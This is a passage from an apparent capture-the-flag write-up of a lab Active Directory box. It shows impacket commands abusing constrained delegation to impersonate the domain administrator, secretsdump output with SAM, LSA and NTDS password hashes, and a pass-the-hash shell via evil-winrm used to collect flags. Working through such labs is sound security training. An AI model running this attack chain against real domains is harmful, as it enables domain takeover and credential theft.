access to the service Information on the machine hosting the service I’ll be gaining access to So, we have a compromised account with constrained delegation. We could simply aim high and try impersonating the administrator account and we know most things about the target machine, let’s try using this information then First they use a tool called kekeo to get the ‘TGT’ - the “Ticket Granting Ticket”. We should be able to do the same thing with impacket again rob:CroccCrew/ $ impacket-getTGT COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.10.145.144 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Saving ticket in password-reset.ccache Ok, so far so good. Next they use this TGT to impersonate another user, again we have an impacket option for this rob:CroccCrew/ $ impacket-getST -spn HTTP/dc.cooctus.corp -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Using TGT from cache [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option) [-] Probably SPN is not allowed to delegate by user password-reset or initial TGT not forwardable The SPN value is a bit of a guess, this is what we got in the output of our GetUserSPNs command earlier, back to google again! We find another tool, findDelegation that shows us what exactly the constrained privileges we have are rob:CroccCrew/ $ impacket-findDelegation -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation AccountName AccountType DelegationType DelegationRightsTo -------------- ----------- ---------------------------------- ----------------------------------- password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS.CORP password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP password-reset Person Constrained w/ Protocol Transition oakley/DC password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS password-reset Person Constrained w/ Protocol Transition oakley/DC/COOCTUS When we try this new information in place of the SPN name we seem to get a little further rob:CroccCrew/ $ impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Using TGT from cache [*] Impersonating administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in administrator.ccache Excellent, with the administrator ticket we should now be able to extract the admin hash with secretsdump rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/administrator Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [*] Cleaning up... Of course, nothing is ever easy is it! Turning on debug and specifying the target host gives us a little more information rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass -debug COOCTUS.CORP/administrator@10.10.145.144 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket [+] Using Kerberos Cache: administrator.ccache [+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache [+] AnySPN is True, looking for another suitable SPN [+] SPN KRBTGT/COOCTUS.CORP@COOCTUS.CORP not found in cache [+] AnySPN is True, looking for another suitable SPN [+] No valid credentials found in cache. [+] Trying to connect to KDC at 10.10.145.144 [+] Trying to connect to KDC at 10.10.145.144 [+] SMBConnection didn't work, hoping Kerberos will help (Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)) [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [+] Exiting NTDSHashes.dump() because SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.) [*] Cleaning up... These lines are interesting [+] Using Kerberos Cache: administrator.ccache [+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache So is the address of the Domain Controller written into the ticket? Or the name rather I guess? The DC name used in the GetST command was DC.COOCTUS.CORP, perhaps if we add that to our hosts file? In a real life scenario it would of course be resolvable by DNS rob:CroccCrew/ $ impacket-secretsdump -k -no-pass DC.COOCTUS.CORP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0xe748a0def7614d3306bd536cdc51bebe [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC COOCTUS\DC$:plain_password_hex:20e32c4c2471c0730dd322a4cd1068bebb17034932676917c1375b18d0fb2ab5710da01b79a6bef1a5a88ffc6946b710114ea28826d1dc889b67d29c4492ce3f0cbff2f11c8f13237832264563ae3ea81d53d9abd4c33f71d123df4a7f187af042e0c5b8d30ef19d0f038d855a7bc12f5f032a03bc13b3d2a2af91adfeb0391e6410ef4922e6a56d1b94ca9ef6ccbec53b7c685b091f2b60374529d85f79a0b0ccbaefb7fb0f61d623fa13a490ac385a0943b31ff6d4f604ad6569c593f9b112aa8fa4d746a4001d91ebf8b0dcfbd3cf5363ea370a347ea7aaf55e27f359f621986ee488059251efefee4b9c790910ea COOCTUS\DC$:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1::: [*] DPAPI_SYSTEM dpapi_machinekey:0xdadf91990ade51602422e8283bad7a4771ca859b dpapi_userkey:0x95ca7d2a7ae7ce38f20f1b11c22a05e5e23b321b [*] NL$KM 0000 D5 05 74 5F A7 08 35 EA EC 25 41 2C 20 DC 36 0C ..t_..5..%A, .6. 0010 AC CE CB 12 8C 13 AC 43 58 9C F7 5C 88 E4 7A C3 .......CX..\..z. 0020 98 F2 BB EC 5F CB 14 63 1D 43 8C 81 11 1E 51 EC ...._..c.C....Q. 0030 66 07 6D FB 19 C4 2C 0E 9A 07 30 2A 90 27 2C 6B f.m...,...0*.',k NL$KM:d505745fa70835eaec25412c20dc360caccecb128c13ac43589cf75c88e47ac398f2bbec5fcb14631d438c81111e51ec66076dfb19c42c0e9a07302a90272c6b [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:'aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d'::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e::: COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1::: COOCTUS.CORP\mark:1115:aad3b435b51404eeaad3b435b51404ee:0b5e04d90dcab62cc0658120848244ef::: COOCTUS.CORP\Jeff:1116:aad3b435b51404eeaad3b435b51404ee:1004ed2b099a7c8eaecb42b3d73cc9b7::: COOCTUS.CORP\Spooks:1117:aad3b435b51404eeaad3b435b51404ee:07148bf4dacd80f63ef09a0af64fbaf9::: COOCTUS.CORP\Steve:1119:aad3b435b51404eeaad3b435b51404ee:2ae85453d7d606ec715ef2552e16e9b0::: COOCTUS.CORP\Howard:1120:aad3b435b51404eeaad3b435b51404ee:65340e6e2e459eea55ae539f0ec9def4::: COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a::: COOCTUS.CORP\Fawaz:1122:aad3b435b51404eeaad3b435b51404ee:d342c532bc9e11fc975a1e7fbc31ed8c::: COOCTUS.CORP\karen:1123:aad3b435b51404eeaad3b435b51404ee:e5810f3c99ae2abb2232ed8458a61309::: COOCTUS.CORP\cryillic:1124:aad3b435b51404eeaad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf::: COOCTUS.CORP\yumeko:1125:aad3b435b51404eeaad3b435b51404ee:c0e0e39ac7cab8c57c3543c04c340b49::: COOCTUS.CORP\pars:1126:aad3b435b51404eeaad3b435b51404ee:fad642fb63dcc57a24c71bdc47e55a05::: COOCTUS.CORP\kevin:1127:aad3b435b51404eeaad3b435b51404ee:48de70d96bf7b6874ec195cd5d389a09::: COOCTUS.CORP\jon:1128:aad3b435b51404eeaad3b435b51404ee:7f828aaed37d032d7305d6d5016ccbb3::: COOCTUS.CORP\Varg:1129:aad3b435b51404eeaad3b435b51404ee:7da62b00d4b258a03708b3c189b41a7e::: COOCTUS.CORP\evan:1130:aad3b435b51404eeaad3b435b51404ee:8c4b625853d78e84fb8b3c4bcd2328c5::: COOCTUS.CORP\Ben:1131:aad3b435b51404eeaad3b435b51404ee:1ce6fec89649608d974d51a4d6066f12::: COOCTUS.CORP\David:1132:aad3b435b51404eeaad3b435b51404ee:f863e27063f2ccfb71914b300f69186a::: COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1::: [*] Kerberos keys grabbed --snip-- [*] Cleaning up... We should be able to use evil-winrm now to pass this administrator hash (just the second half after the ‘:') and get a shell (finally!!) rob:CroccCrew/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.145.144 -u administrator -H 'add41095f1fb0405b32f70a489de022d' -n Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents whoami cooctus\administrator We use -n to specify no colours as this often messes up the command prompt Backtracking as Administrator As we’ve jumped here straight to administrator, which was our foothold was SO long and most probably not the intended method, we have to backtrack now to find the flags for the other key users We can start with a quick search for the usual suspect *Evil-WinRM* PS C:\Users\admCroccCrew Get-Childitem -Path C:\ -Include *user*.txt* -File -Recurse -ErrorAction SilentlyContinue Directory: C:\Shares\Home Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/7/2021 8:14 PM 17 user.txt *Evil-WinRM* PS C:\Users\admCroccCrew type C:\Shares\Home\user.txt THM{REDACTED} Ahh, that’s just the same flag again in the SMB share! However we do find some more useful files in that same directory (which presumably with the appropriate user access rights we could have seen via SMB) *Evil-WinRM* PS C:\Shares\Home dir Directory: C:\Shares\Home Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/8/2021 12:38 PM 28 priv-esc-2.txt -a---- 6/7/2021 8:08 PM 22 priv-esc.txt -a---- 6/7/2021 8:14 PM 17 user.txt So we can get #3 *Evil-WinRM* PS C:\Shares\Home cat priv-esc.txt THM{0n-Y0ur-Way-t0-DA} And #4 *Evil-WinRM* PS C:\Shares\Home cat priv-esc-2.txt THM{Wh4t-t0-d0...Wh4t-t0-d0} Lastly let’s do a search again for the root flag, #5 *Evil-WinRM* PS C:\Shares\Home Get-Childitem -Path / -Include root.txt -File -Recurse -ErrorAction SilentlyContinue Directory: C:\PerfLogs\Admin Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/7/2021 8:07 PM 22 root.txt And we finish the box with *Evil-WinRM* PS C:\Shares\Home type C:\PerfLogs\Admin\root.txt THM{REDACTED} NB: Reading through the writeups after the event, mainly to see if there was a more intended route than going directly to administrator, one of the writeups (by chrismeistre) had a great link that’s worth noting here for future reference. Also below is another link worth reading, cited by the first author as their main reference (also a perfect domain name! 😄) http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html